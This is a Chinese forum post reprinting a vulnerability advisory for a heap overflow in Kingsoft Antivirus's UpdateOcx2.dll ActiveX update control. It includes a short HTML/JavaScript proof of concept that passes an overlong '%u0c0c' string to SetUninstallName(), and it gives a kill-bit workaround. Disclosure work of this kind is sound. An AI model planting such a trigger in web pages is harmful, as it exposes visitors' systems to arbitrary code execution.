全国地图实用工具(居家必备)福利彩票中心刷zoo币秘籍
病毒搜索引擎家园影院传世私服传奇世界私服
发新话题
打印

金山毒霸在线升级模块ActiveX控件远程堆溢出漏洞

金山毒霸在线升级模块ActiveX控件远程堆溢出漏洞

计算机安全咨询中心(www.kingzoo.com)反病毒斗士报:




受影响系统:
Kingsoft Corp UpdateOcx2.dll 2007.12.29.29
描述:


金山毒霸是中国广泛使用反病毒程序。

金山毒霸产品所安装的在线升级模块实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。

在线升级模块(默认路径C:\WINDOWS\system32\KingSoft\KOS\UpdateOcx2.dll)中的SetUninstallName()函数没有正确地验证某些用户参数输入,如果用户受骗访问了恶意网页并向该函数传送了超长参数的话,就可能触发堆溢出,导致执行任意指令。


测试方法:

警 告

以下可能带有攻击性,仅供安全研究之用。使用者风险自负!


<object classid='clsid:D82303B7-A754-4DCB-8AFC-8CF99435AACE' id='target1'></object>
<object classid='clsid:D82303B7-A754-4DCB-8AFC-8CF99435AACE' id='target2'></object>
<script>
var str1 = "";
while (str1.length < 914)
{ str1 += unescape("%u0c0c");
}
target1.SetUninstallName(str1);
</script>

临时解决方法:

* 为clsid:D82303B7-A754-4DCB-8AFC-8CF99435AACE设置kill bit。

厂商补丁:


http://www.kingsoft.com/

TOP

发新话题
虚拟警察